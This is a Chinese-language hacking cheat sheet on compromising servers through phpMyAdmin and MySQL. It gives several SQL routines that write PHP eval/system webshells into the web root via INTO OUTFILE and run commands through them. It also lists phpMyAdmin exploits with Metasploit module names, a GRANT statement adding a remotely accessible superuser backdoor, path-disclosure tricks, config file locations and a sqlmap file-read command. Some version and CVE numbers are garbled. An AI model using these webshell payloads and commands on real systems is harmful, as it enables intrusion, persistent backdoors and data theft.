方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/.php 一句话连接密码:xiaoma 方法二: Create TABLE xiaoma (xiaoma1 text NOT NULL); Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>'); select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS xiaoma; 方法三: 读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php' cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php' 方法四: select load_file('E:/xamp/www/xiaoma.php'); select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php' 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
phpmyadmin 漏洞总结 (-- ::) 一: 影响版本: < -rc3 概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞 利用模块:exploit/multi/http/phpmyadmin_preg_replace CVE: CVE-- 二: 影响版本:phpMyAdmin v3. 概述:PhpMyAdmin存在server_sync.php 后门漏洞 利用模块:exploit/multi/http/phpmyadmin_3522_backdoor CVE: CVE-- 三: 影响版本: .x < 3.1.3.1; 概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行 利用模块:exploit/unix/webapp/phpmyadmin_config CVE: CVE-- . 影响版本:phpmyadmin --phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入: 密码空 'localhost'@'@" 复制代码5. phpMyAdmin < .x Swekey远程代码注入攻击 . phpmyadmin 2.80 反序列 lfi、 rfi包含 漏洞文件 ss phpmyadmin一句话开启外链mysql :添加超级用户guetsec密码ooxx并且允许外连 GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION; phpmyadmin 暴绝对路径: . 用Web路径自动盲爆工具 V2. 乌云内测(带字典).rar .扫phpinfo.php info.php php.php test.php等等 . 上传图片 超长文件名! .phpmyadmin构造xml上传暴路径 .phpmyadmin读取系统文件cmd爆路径! .phpmyadmin读取 iis6,iis7配置文件 读取apache Nginx 配置文件! windows2003 iis6配置文件所在位置C:\Windows/system32\inetsrv\metabase.xml win2008/ iis7. 在这个文件C:\Windows\System32\inetsrv\config\applicationHost.config apache配置:/etc/httpd/conf/httpd.conf /usr/local/apache2/conf/httpd.conf Nginx配置 /etc/nginx/conf.d/vhost.conf /usr/local/etc/nginx/nginx.conf 穿山甲只能读一部分, 上sqlmap sqlmap -u url --file-read 'C:\Windows\System32\inetsrv\config\applicationHost.config'